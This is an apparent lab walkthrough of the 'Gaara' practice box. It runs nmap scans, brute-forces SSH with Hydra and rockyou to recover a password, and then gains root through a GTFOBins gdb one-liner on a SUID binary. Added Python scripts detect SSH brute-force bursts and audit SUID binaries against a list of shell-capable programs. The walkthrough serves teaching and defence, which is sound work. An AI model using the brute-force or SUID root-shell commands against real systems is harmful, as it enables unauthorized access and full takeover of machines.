root at kali in ~/Gaara $ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1654sec preferred_lft 1654sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
1.1 Host discovery
Nmap finds one target IP: 10.10.8.23
root at kali in ~/Gaara $ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.23
Host is up (0.000063s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000047s latency).
MAC Address: 00:50:56:E5:23:AF (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.32 seconds
1.2 Port scan
Scan for open ports:
root at kali in ~/Gaara $ nmap -p- -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST
Nmap scan report for 10.10.8.23
Host is up (0.000033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http
|_http-title: Gaara
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
root at kali in ~/Gaara $ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 10.10.8.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds
1.4 Vulnerability scan
Run a vulnerability scan with Nmap's vuln scripts:
root at kali in ~/Gaara $ nmap --script=vuln -T4 --min-rate 10000 10.10.8.23 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST
Nmap scan report for 10.10.8.23
Host is up (0.000032s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds
root at kali in ~/Gaara $ hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.23
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-20 11:22:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.8.23:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.8.23   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-20 11:24:23
Hydra brute-forces the password: iloveyou2. The hit comes within two minutes at about 166 tries per minute against a single username, which is exactly the pattern an SSH login-failure monitor on the target should have flagged.
With a valid username and password in hand, connect over SSH:
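The Hydra run above leaves a very loud trace on the target: a burst of "Failed password" lines from one source address, followed by an "Accepted password" line once the wordlist hits. The following script is an added example (not part of the original write-up and not a tool from the Gaara box) showing how a defender would detect that pattern in sshd's auth.log output. The log lines are constructed to mirror the scenario; the hostname, addresses and the year 2024 (syslog timestamps carry no year) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not captured from the page's target host).
SAMPLE_AUTH_LOG = """\
Jun 20 11:22:43 Gaara sshd[1201]: Failed password for gaara from 10.10.8.17 port 50210 ssh2
Jun 20 11:22:43 Gaara sshd[1202]: Failed password for gaara from 10.10.8.17 port 50212 ssh2
Jun 20 11:22:44 Gaara sshd[1203]: Failed password for invalid user admin from 10.10.8.17 port 50214 ssh2
Jun 20 11:22:44 Gaara sshd[1204]: Failed password for gaara from 10.10.8.17 port 50216 ssh2
Jun 20 11:22:45 Gaara sshd[1205]: Failed password for gaara from 10.10.8.17 port 50218 ssh2
Jun 20 11:22:45 Gaara sshd[1206]: Failed password for gaara from 10.10.8.17 port 50220 ssh2
Jun 20 11:23:10 Gaara sshd[1207]: Accepted password for gaara from 10.10.8.17 port 50330 ssh2
Jun 20 11:30:00 Gaara sshd[1300]: Failed password for gaara from 192.168.220.1 port 41000 ssh2
Jun 20 11:45:00 Gaara sshd[1301]: Accepted publickey for gaara from 192.168.220.1 port 41002 ssh2
"""

# Matches the sshd password/publickey outcome lines; "invalid user" is optional.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_sshd(lines, year=2024):
    """Return a list of (timestamp, result, user, ip) tuples for recognised sshd lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unrelated log line, skip it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Map source IP -> (max failures in any window, login succeeded afterwards?)
    for every IP whose failure count inside a sliding window reaches threshold."""
    by_ip = defaultdict(list)
    for ts, result, _user, ip in events:
        by_ip[ip].append((ts, result))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [ts for ts, r in evs if r == "Failed"]
        best = start = 0
        for end in range(len(fails)):
            # Shrink the window from the left until it spans at most window_seconds.
            while (fails[end] - fails[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_fail = fails[-1]
            # A success after the burst is the "password found" signal, the highest-priority case.
            success_after = any(r == "Accepted" and ts > last_fail for ts, r in evs)
            alerts[ip] = (best, success_after)
    return alerts


if __name__ == "__main__":
    for ip, (count, compromised) in detect_bruteforce(parse_sshd(SAMPLE_AUTH_LOG.splitlines())).items():
        print(f"{ip}: {count} failures in window, success afterwards: {compromised}")
```

On the sample the only alert is for 10.10.8.17, with six failures inside one minute and a successful login afterwards. In practice the same logic is what fail2ban or an SSH rate limit acts on; the more durable fix is to disallow password authentication for the account entirely, since a wordlist password like iloveyou2 falls to rockyou regardless of how slow the attacker is forced to go.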
root at kali in ~/Gaara $ ssh gaara@10.10.8.23
The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established.
ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts.
gaara@10.10.8.23's password:
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  3 00:14:55 2022 from 192.168.220.1
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
gaara@Gaara:/usr/local/games$ sudo -l
sudo: unable to resolve host Gaara: Name or service not known
[sudo] password for gaara:
Sorry, user gaara may not run sudo on Gaara.
A gdb binary turns up. GDB (the GNU Debugger) is a powerful command-line debugger for C and C++ programs on Linux.
Check GTFOBins for a SUID privilege-escalation route:
There is one, so run it directly:
gaara@Gaara:/usr/local/games$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
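The root shell above exists only because gdb, which embeds a Python interpreter, was installed setuid root. Any debugger, interpreter or editor with the SUID bit is equivalent to handing out root, which is why GTFOBins lists them. The following script is an added example (not part of the original write-up) of the audit a defender would run to catch such a misconfiguration: it collects setuid-root files and splits them into the expected baseline, binaries known to spawn a shell, and anything unknown that needs review. The name lists are an assumption drawn from common GTFOBins categories and are not exhaustive; the sample path list is constructed, not the real output from the Gaara box.

```python
import os
import stat
import sys

# Binaries that give a shell or arbitrary file access when SUID root (assumed, partial list).
SHELL_CAPABLE = {
    "gdb", "python", "python2", "python3", "perl", "ruby", "php", "node",
    "vim", "vi", "nano", "find", "env", "bash", "sh", "dash", "awk", "gawk",
    "less", "more", "cp", "mv", "tar", "nmap", "strace",
}

# Setuid binaries that are normal on a Debian-style system (assumed baseline).
EXPECTED_SUID = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd",
    "newgrp", "ping", "fusermount", "pkexec",
}

# Constructed sample, standing in for `find / -perm -4000 -type f` output.
SAMPLE_SUID = [
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/gdb",
    "/usr/bin/python3.7",
    "/usr/bin/mount",
    "/opt/backup/helper",
]


def collect_suid(root="/"):
    """Walk root and return every regular file that is setuid and owned by uid 0."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished, skip
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                found.append(path)
    return found


def classify_suid(paths):
    """Split SUID paths into expected (baseline), shell_capable (urgent) and unknown (review)."""
    report = {"expected": [], "shell_capable": [], "unknown": []}
    for path in sorted(paths):
        name = os.path.basename(path)
        stem = name.rstrip("0123456789.")  # python3.7 -> python, perl5.30 -> perl
        if name in EXPECTED_SUID:
            report["expected"].append(path)
        elif name in SHELL_CAPABLE or stem in SHELL_CAPABLE:
            report["shell_capable"].append(path)
        else:
            report["unknown"].append(path)
    return report


def remediation_commands(report):
    """Return the chmod lines that strip the setuid bit from the urgent findings."""
    return [f"chmod u-s {path}" for path in report["shell_capable"]]


if __name__ == "__main__":
    # With a directory argument the script audits a live tree; otherwise it uses the sample.
    paths = collect_suid(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SUID
    result = classify_suid(paths)
    for bucket, entries in result.items():
        print(f"[{bucket}]")
        for entry in entries:
            print(f"  {entry}")
    for cmd in remediation_commands(result):
        print(cmd)
```

On the sample, /usr/bin/gdb and /usr/bin/python3.7 land in the urgent bucket and /opt/backup/helper is flagged for review, while passwd, sudo and mount are treated as baseline. Running the audit from cron and diffing the result against a known-good list turns an accidental `chmod u+s` on a debugger into an alert instead of a root shell.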